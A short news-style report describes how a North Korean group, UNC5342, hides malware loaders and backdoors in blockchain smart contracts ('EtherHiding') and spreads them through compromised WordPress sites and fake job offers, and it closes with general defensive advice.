North Korean state-sponsored hackers, identified as UNC5342, have developed a novel technique to embed unremovable malware within blockchain smart contracts, posing a significant threat to the cryptocurrency industry. This method, termed "EtherHiding," leverages the immutable and transparent nature of public blockchains like Ethereum and BNB Smart Chain to conceal malicious code, making detection and removal exceedingly challenging.
The campaign, active since February 2025, involves the use of JavaScript-based loaders, such as JADESNOW, which download and execute a sophisticated backdoor named INVISIBLEFERRET directly from data stored on the blockchain. By utilizing read-only blockchain calls that do not generate visible transaction activity, the attackers evade detection mechanisms. The immutable nature of smart contracts ensures that once the malicious code is embedded, it cannot be altered or removed, allowing the malware to persist indefinitely.
To distribute the malware, UNC5342 has employed deceptive tactics, including compromising WordPress sites and luring cryptocurrency developers with fake job offers and coding challenges. Victims unknowingly trigger malware downloads by visiting these compromised websites, leading to the installation of the INVISIBLEFERRET backdoor. This approach signifies a concerning evolution in cyberattack strategies, utilizing blockchain technology for persistent and stealthy malware deployment.
The use of blockchain to host malicious payloads represents a shift toward next-generation "bulletproof hosting," where the decentralized and immutable characteristics of blockchain networks are exploited to avoid detection and takedown efforts. This development underscores the need for enhanced security measures within the cryptocurrency ecosystem to detect and mitigate such sophisticated threats.
In response to this emerging threat, cybersecurity experts recommend that blockchain platforms and cryptocurrency developers implement robust security protocols, conduct regular audits of smart contracts, and stay vigilant against social engineering tactics. Additionally, users are advised to exercise caution when interacting with unfamiliar websites or downloading files from untrusted sources to mitigate the risk of falling victim to such attacks.
